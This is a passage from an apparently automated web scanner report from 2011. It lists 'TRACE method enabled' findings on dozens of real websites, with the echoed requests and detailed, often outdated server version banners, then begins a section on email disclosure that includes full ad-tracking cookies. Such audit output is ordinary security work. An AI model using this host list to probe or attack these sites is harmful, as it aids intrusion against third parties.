Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-bikini.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.the-bikini.com
Cookie: 4da8d4a1cac4b60a

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:48:57 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.the-bikini.com
Cookie: 4da8d4a1cac4b60a

26.269. http://www.the-clitoris.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-clitoris.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.the-clitoris.com
Cookie: 1f31d630e9a24ab7

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.the-clitoris.com
Cookie: 1f31d630e9a24ab7

26.270. http://www.thebeatles.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thebeatles.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thebeatles.com
Cookie: 403d2c533532836c

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:52:53 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
X-Forwarded-For: 173.193.214.243
Host: www.thebeatles.com
Cookie: 403d2c533532836c

26.271. http://www.thefactsaboutfitness.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefactsaboutfitness.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thefactsaboutfitness.com
Cookie: b6dadf8902e9c8a2

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:39 GMT
Server: Apache/1.3.42 (Unix) (Red-Hat/Linux) PHP/5.2.13 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8n-fips FrontPage/4.0.4.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b6dadf8902e9c8a2
Host: www.thefactsaboutfitness.com

26.272. http://www.thefastresult.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefastresult.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thefastresult.com
Cookie: 8397e348d65202ac

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:29 GMT
Server: Apache/2.2.9 (Debian) mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thefastresult.com
Cookie: 8397e348d65202ac

26.273. http://www.thegreenhead.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegreenhead.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thegreenhead.com
Cookie: 75ff8528a7c9fddc

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thegreenhead.com
Cookie: 75ff8528a7c9fddc

26.274. http://www.thehothits.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehothits.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thehothits.com
Cookie: 51864785c53d4c2b

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:26:08 GMT
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thehothits.com
Cookie: 51864785c53d4c2b

26.275. http://www.thehunsearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehunsearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thehunsearch.com
Cookie: 739cf5c1e4f00bdf

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thehunsearch.com
Cookie: 739cf5c1e4f00bdf

26.276. http://www.theteachersguide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theteachersguide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.theteachersguide.com
Cookie: 3e51c484c0cfc168

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:58 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3e51c484c0cfc168
Host: www.theteachersguide.com

26.277. http://www.thewallpapers.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thewallpapers.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thewallpapers.org
Cookie: db1a4fe6c4af9673

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thewallpapers.org
Cookie: db1a4fe6c4af9673

26.278. http://www.ticketluck.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketluck.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ticketluck.com
Cookie: c5224ccccd329355

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:19 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ticketluck.com
Cookie: c5224ccccd329355

26.279. http://www.tjc.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tjc.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tjc.edu
Cookie: 8033b4a65fa0980a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:45 GMT
Server: Apache/2.2.11 (Win32) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tjc.edu
Cookie: 8033b4a65fa0980a

26.280. http://www.tomorrowsworld.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomorrowsworld.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tomorrowsworld.org
Cookie: a655b2a6ded1e6d6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:49:28 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tomorrowsworld.org
Cookie: a655b2a6ded1e6d6

26.281. http://www.top-10-list.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top-10-list.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.top-10-list.org
Cookie: 537e444b79c2d005

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.top-10-list.org
Cookie: 537e444b79c2d005

26.282. http://www.top21sites.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top21sites.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.top21sites.com
Cookie: 186639d8a006b31d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:30 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.top21sites.com
Cookie: 186639d8a006b31d

26.283. http://www.tradingplaceamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingplaceamerica.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tradingplaceamerica.com
Cookie: 4e59fa5a736afe6f

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:39 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 4e59fa5a736afe6f
Host: www.tradingplaceamerica.com

26.284. http://www.trilulilu.ro/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trilulilu.ro
Path:   /

Request

TRACE / HTTP/1.0
Host: www.trilulilu.ro
Cookie: 554eae1334b24973

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:05 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.trilulilu.ro
Cookie: 554eae1334b24973
X-Forwarded-For: 173.193.214.243

26.285. http://www.truzu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truzu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.truzu.com
Cookie: f2f85843925a37a2

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.truzu.com
Cookie: f2f85843925a37a2

26.286. http://www.tutorialized.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tutorialized.com
Cookie: 9567254be14ea435

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tutorialized.com
Cookie: 9567254be14ea435

26.287. http://www.tvgrapevine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvgrapevine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tvgrapevine.com
Cookie: c6187fb56e03fed2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:12:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tvgrapevine.com
Cookie: c6187fb56e03fed2

26.288. http://www.tvmovie.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvmovie.de
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tvmovie.de
Cookie: aa137b8c4d7fcc19

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tvmovie.de
Cookie: aa137b8c4d7fcc19
Connection: Keep-Alive

26.289. http://www.twitter-icons.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitter-icons.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.twitter-icons.net
Cookie: 199634ff3a925da3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:26 GMT
Server: Apache/2.2.15 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.twitter-icons.net
Cookie: 199634ff3a925da3

26.290. http://www.undisciplined-subs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.undisciplined-subs.com
Cookie: 8a7bddc3909ccfdb

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.7e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8a7bddc3909ccfdb
Host: www.undisciplined-subs.com

26.291. http://www.uni.cc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.uni.cc
Cookie: 4f0378bdbd0b2825

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:37 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.uni.cc
Cookie: 4f0378bdbd0b2825

26.292. http://www.unjiloma.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unjiloma.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unjiloma.info
Cookie: e6544e48a570a054

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:24:26 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.unjiloma.info
Cookie: e6544e48a570a054

26.293. http://www.unlimitedgamer.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unlimitedgamer.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unlimitedgamer.net
Cookie: fe18fa7897cdc480

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:59 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fe18fa7897cdc480
Host: www.unlimitedgamer.net

26.294. http://www.unscramble.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unscramble.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unscramble.net
Cookie: 97b5889fe770fe89

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.unscramble.net
Cookie: 97b5889fe770fe89

26.295. http://www.usa4sale.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa4sale.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usa4sale.net
Cookie: b1585db2eb4ff04b

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usa4sale.net
Cookie: b1585db2eb4ff04b

26.296. http://www.usdebtclock.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usdebtclock.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usdebtclock.org
Cookie: 36abeb0ccf828cb5

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usdebtclock.org
Cookie: 36abeb0ccf828cb5

26.297. http://www.usmortgagerelief.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmortgagerelief.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usmortgagerelief.org
Cookie: 5f8084b44d2229d3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 04:46:45 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9 mod_ssl/2.2.11 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usmortgagerelief.org
Cookie: 5f8084b44d2229d3

26.298. http://www.usovernightcheck.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usovernightcheck.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usovernightcheck.com
Cookie: 17f23a7266a94c00

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:15 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usovernightcheck.com
Cookie: 17f23a7266a94c00

26.299. http://www.villagehatshop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.villagehatshop.com
Cookie: 66acc6c76621ccfa

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.villagehatshop.com
Cookie: 66acc6c76621ccfa

26.300. http://www.vocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vocal.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vocal.com
Cookie: dfbe88588e57d7c3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:34 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vocal.com
Cookie: dfbe88588e57d7c3

26.301. http://www.watchfreetvonline.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.watchfreetvonline.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.watchfreetvonline.net
Cookie: 3616f72a0bafa9e6

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.watchfreetvonline.net
Cookie: 3616f72a0bafa9e6

26.302. http://www.web-ppc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.web-ppc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.web-ppc.com
Cookie: be33c264c918185b

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.web-ppc.com
Cookie: be33c264c918185b

26.303. http://www.webme.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webme.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webme.com
Cookie: 170d979a289480c7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:23 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webme.com
Cookie: 170d979a289480c7

26.304. http://www.webstore.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webstore.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webstore.com
Cookie: bb2e7162a7c4ad11

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:29 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webstore.com
Cookie: bb2e7162a7c4ad11

26.305. http://www.whiskeyclips.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whiskeyclips.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whiskeyclips.com
Cookie: f2ef7b9bd318976

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f2ef7b9bd318976
Host: www.whiskeyclips.com

26.306. http://www.worldnewstwo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldnewstwo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldnewstwo.com
Cookie: 5eecb79e0d7a879f

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worldnewstwo.com
Cookie: 5eecb79e0d7a879f

26.307. http://www.worldtvpc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldtvpc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldtvpc.com
Cookie: ddde6553f58d6770

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worldtvpc.com
Cookie: ddde6553f58d6770

26.308. http://www.wponew.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wponew.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wponew.com
Cookie: 77ba071d7131fa87

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:19 GMT
Server: Apache/2.2.8 (Unix) PHP/5.1.6 mod_fastcgi/2.4.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wponew.com
Cookie: 77ba071d7131fa87

26.309. http://www.wrestlezone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wrestlezone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wrestlezone.com
Cookie: 7a267cf8f7c3ebe8

Response

HTTP/1.1 200 OK
Server: Apache/2
Content-Type: message/http
Content-Length: 129
Date: Sun, 01 May 2011 23:41:17 GMT
X-Varnish: 202714054
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy2v.sb.lax2

TRACE / HTTP/1.0
Host: www.wrestlezone.com
Cookie: 7a267cf8f7c3ebe8
X-Varnish: 202714054
X-Forwarded-For: 173.193.214.243

26.310. http://www.wwmt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wwmt.com
Cookie: 20c984071129834d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wwmt.com
Cookie: 20c984071129834d

26.311. http://www.xbox360iso.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xbox360iso.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xbox360iso.com
Cookie: 93e21820c5cd6911

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 07:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xbox360iso.com
Cookie: 93e21820c5cd6911

26.312. http://www.yeahbaby.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeahbaby.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yeahbaby.com
Cookie: 980933f06c086cac

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:02:32 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yeahbaby.com
Cookie: 980933f06c086cac

26.313. http://www.ymlp44.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp44.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ymlp44.com
Cookie: 1525fbde0f321ed2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp44.com
Cookie: 1525fbde0f321ed2

26.314. http://www.yng.me/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yng.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yng.me
Cookie: afbce366cff43ef3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yng.me
Cookie: afbce366cff43ef3

27. Email addresses disclosed  previous  next
There are 44 instances of this issue:

27.1. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
27.2. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

